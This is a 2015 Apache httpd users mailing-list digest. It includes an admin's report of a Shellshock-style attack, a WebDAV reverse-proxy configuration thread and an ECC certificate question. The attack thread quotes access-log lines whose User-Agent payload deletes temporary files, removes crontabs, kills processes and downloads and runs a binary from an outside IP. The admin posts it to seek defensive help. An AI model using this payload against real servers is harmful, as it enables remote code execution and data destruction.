[users@httpd] Security question

[Bremser, Kurt (AMOS Austria GmbH)]

So you have CGI enabled on the document root?

Kurt Bremser
AMOS Austria

Newton was wrong. There is no gravity. The Earth sucks.

Von: Victor Sterpu [vic...@casnt.ro]
Gesendet: Freitag, 3. Juli 2015 08:16
An: users@httpd.apache.org
Betreff: **SPAM?** Re: [users@httpd] Security question [wd-vc]

"sc.gif" was executed.

On 03.07.2015 09:05, Bremser, Kurt (AMOS Austria GmbH) wrote:
I guess that the 200 comes from the fact that apache simply delivered the 
/index.html page.
Or did you find that "sc.gif" was transferred and executed?

Kurt Bremser
AMOS Austria

Newton was wrong. There is no gravity. The Earth sucks.

Von: Victor Sterpu [vic...@casnt.ro]
Gesendet: Donnerstag, 2. Juli 2015 14:29
An: users@httpd.apache.org
Betreff: **SPAM?** Re: [users@httpd] Security question [wd-vc]

In the end the attack was succesfull. Log show the last command:
62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 "-" "() 
{ :;};/usr/bin/perl -e 'print \"Content-Type: 
text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf 
/tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab -r ; 
killall -9 wget fetch curl lwp-download b f r xx y i.gif print start pscan 
pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O 
http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"

But I don't know how he launched this script.
How can I prevent this?
I was hoping the server would execute only local scripts, is there something I 
can do to allow only local scripts to be executed?


On 02.07.2015 15:13, Yehuda Katz wrote:

It is an attempt to exploit a specific configuration. By the fact that apache 
returned a 404 (the log line says so), you can see that attempt was not 
successful.

- Y

Sent from a gizmo with a very small keyboard and hyperactive autocorrect.

On Jul 2, 2015 8:00 AM, "Victor Sterpu" 
mailto:vic...@casnt.ro>> wrote:
Hello

A hacker attacked a apache2 web server by HTTP injection.
The log show what he has done:
62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper 
HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: 
text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf 
/tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab -r ; 
killall -9 wget fetch curl lwp-download b f r xx y i.gif print start pscan 
pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O 
http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"

How can I prevent this in the future and how can I reproduce?
I tried to reproduce but is not clear how he launched this command and I want 
to know so I can test my vulnerabilities in the future.
The path "/phppath/cgi_wrapper" doesn't exist at all.

Thank you

-
To unsubscribe, e-mail: 
users-unsubscr...@httpd.apache.org
For additional commands, e-mail: 
users-h...@httpd.apache.org



AMOS Austria GmbH
1130 Wien, Hietzinger Kai 101-105
FN 365014k, Handelsgericht Wien
UID: ATU 66614737

http://www.allianz.at


Dieses E-Mail und allfaellig daran angeschlossene Anhaenge
enthalten Informationen, die vertraulich und
ausschliesslich fuer den (die) bezeichneten Adressaten
bestimmt sind.
Wenn Sie nicht der genannte Adressat sind, darf dieses
E-Mail samt allfaelliger Anhaenge von Ihnen weder anderen
Personen zugaenglich gemacht noch in anderer Weise
verwertet werden.
Wenn Sie nicht der beabsichtigte Empfaenger sind, bitten
wir Sie, dieses E-Mail und saemtliche angeschlossene
Anhaenge zu loeschen.

Please note: This email and any files transmitted with it is
intended only for the named recipients and may contain
confidential and/or privileged information. If you are not the
intended recipient, please do not read, copy, use or disclose
the contents of this communication to others and notify the
sender immediately. Then please delete the email and any
copies of it. Thank you.



AMOS Austria GmbH 
1130 Wien, Hietzinger Kai 101-105 
FN 365014k, Handelsgericht Wien 
UID: ATU 66614737 

http://www.allianz.at 

 
Dieses E-Mail und allfaellig daran angeschlossene Anhaenge 
enthalten Informationen, die vertraulich und 
ausschliesslich fuer den (die) bezeichneten Adressaten 
bestimmt sind. 
Wenn Sie nicht der genannte Adressat sind, darf dieses 
E-Mail samt allfaelliger Anhaenge von Ihnen weder anderen 
Personen zugaenglich gemacht noch in anderer Weise 
verwertet werden.
Wenn Sie nicht der beabsichtigte Empfaenger sind, bitten
wir Sie, dieses E-Mail und saemtliche angeschlossene
Anhaenge zu loeschen. 

Please note: This email and any files

Re: [users@httpd] WebDAV reverse proxy SLOW

[Marat Khalili]

Problems solved, under Windows 8 you need to listen to localhost IPv6 
address as well.


--

With Best Regards,
Marat Khalili


On 01/07/15 13:51, Marat Khalili wrote:

Dear all,

I'm configuring a reverse proxy with configuration provided below, for 
Apache 2.4 for Windows (I'm trying to bypass Windows authentication 
dialogs this way). It works, but file browsing is very slow: listing 
three files in a folder takes several seconds, dir /b/s comes line 
after line, and doesn't improve. In contrast, same WebDAV resource 
connected directly or via NetDrive utility is quite responsive. I 
suspect Apache does not reuse connections or similar problems, but 
can't find more parameters to tune. Please advise.



--

With Best Regards,
Marat Khalili


httpd.conf:

Define SRVROOT "/Apache24"
ServerRoot "${SRVROOT}"

Listen 127.0.0.1:80

LoadModule authz_core_module modules/mod_authz_core.so
LoadModule headers_module /Apache24/modules/mod_headers.so
LoadModule proxy_http_module /Apache24/modules/mod_proxy_http.so
LoadModule proxy_module /Apache24/modules/mod_proxy.so
LoadModule socache_shmcb_module modules/mod_socache_shmcb.so
LoadModule ssl_module modules/mod_ssl.so

ServerAdmin i...@rqc.ru
ServerName localhost


AllowOverride none
Require all denied


ErrorLog "logs/error.log"

LogLevel warn

SSLSessionCache "shmcb:${SRVROOT}/logs/ssl_scache(512000)"
SSLSessionCacheTimeout  300


SSLProxyEngine On
SSLProxyProtocol All -SSLv2 -SSLv3
SSLProxyVerify require
SSLProxyCACertificateFile /Apache24/conf/ssl/ca.crt
SSLProxyCheckPeerCN on
SSLProxyCheckPeerExpire on

# this is required to ensure that HTTP headers sent to the
# WebDAV server are "rewritten" from "http://..."; to "https://...";
RequestHeader edit Destination ^http: https: early
RequestHeader set Authorization "Basic DEADBEEFDEADBEEFDEADBEEF"

# the essential proxy part

ProxyPass https://myserver.rqc.ru/ max=8 flushpackets=on 
keepalive=on connectiontimeout=300 timeout=300

ProxyPassReverse /
# some WebDAV clients (such as ordinary browsers) are unhappy 
with the
# cookies sent out by the internal server, so we "rewrite" the 
host and

# the used path to the correct, external representation
ProxyPassReverseCookieDomain myserver.rqc.ru localhost
ProxyPassReverseCookiePath /myserver.rqc.ru/ /

[users@httpd] Apache and Elliptic Curve Cryptography (ECC) Certificates

[fabio . schmidt]

Hi, 

I need to deploy an environment with Apache and mod_ssl and a Elliptic Curve 
Cryptography (ECC) certificate need to be used. 

Does Apache support this type of certificate? 

Kind regards. 

Atenciosamente, 
Fabio S. Schmidt 
Consultor técnico Sênior 
4linux - Open Software Specialists 
http://www.4linux.com.br 

Re: [users@httpd] Apache and Elliptic Curve Cryptography (ECC) Certificates

[Eric Covener]

On Fri, Jul 3, 2015 at 1:13 PM,   wrote:
> Hi,
>
> I need to deploy an environment with Apache and mod_ssl and a Elliptic Curve
> Cryptography (ECC) certificate need to be used.
>
> Does Apache support this type of certificate?

Yes. The manual for mod_ssl has a number of ECC references.
>
> Kind regards.
>
> Atenciosamente,
> Fabio S. Schmidt
> Consultor técnico Sênior
> 4linux - Open Software Specialists
> http://www.4linux.com.br
>



-- 
Eric Covener
cove...@gmail.com

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org